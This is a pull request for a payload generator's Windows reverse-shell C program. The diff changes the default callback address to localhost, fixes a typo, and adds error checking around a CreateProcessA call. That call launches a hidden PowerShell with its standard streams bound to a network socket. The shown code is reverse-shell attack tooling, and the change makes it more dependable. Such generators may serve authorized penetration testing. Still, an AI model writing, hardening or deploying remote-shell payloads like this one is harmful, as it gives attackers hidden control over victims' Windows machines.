### PR TITLE
Add error handling for CreateProcessA in windows reverse shell

### DIFF
--- a/core/payload_generator/windows/tcp/exe/windows.c
+++ b/core/payload_generator/windows/tcp/exe/windows.c
@@ -8,7 +8,7 @@
 #include <string.h>
 
 #if !defined(CLIENT_IP) || !defined(CLIENT_PORT)
-# define CLIENT_IP (char*)"192.168.2.228"
+# define CLIENT_IP (char*)"127.0.0.1"
 # define CLIENT_PORT (int)9001
 #endif
 /* ================================================== */
@@ -21,7 +21,7 @@ int main(void) {
 
 	WSADATA wsaData;
 	if (WSAStartup(MAKEWORD(2 ,2), &wsaData) != 0) {
-		write(2, "[ERROR] WSASturtup failed.\n", 27);
+		write(2, "[ERROR] WSAStartup failed.\n", 27);
 		return (1);
 	}
 
@@ -51,7 +51,11 @@ int main(void) {
 	sinfo.hStdOutput = (HANDLE)sockt;
 	sinfo.hStdError = (HANDLE)sockt;
 	PROCESS_INFORMATION pinfo;
-	CreateProcessA(NULL, "powershell.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo);
+	
+	if (CreateProcessA(NULL, "powershell.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo) == 0) {
+		write(2, "[ERROR] CreateProcessA failed.\n", 31);
+		return (1);
+	}
 
 	return (0);
 }


### PR DESCRIPTION
This PR adds error handling for the `CreateProcessA` call in the reverse shell code to prevent silent failures when spawning the PowerShell process.

**Changes:**
- Wrapped `CreateProcessA` in an `if` condition to check its return value.
- On failure, outputs "[ERROR] CreateProcessA failed." to stderr and exits with code 1.

**Impact:**
- Improves reliability by detecting and reporting failures (e.g., PowerShell not found or permission issues).
- Enhances debuggability by avoiding silent exits with success code.

**Testing:**
- Tested on Windows 11 with localhost (127.0.0.1:9001).
- Verified failure case: Renamed powershell.exe to trigger error, confirmed error message and exit code 1.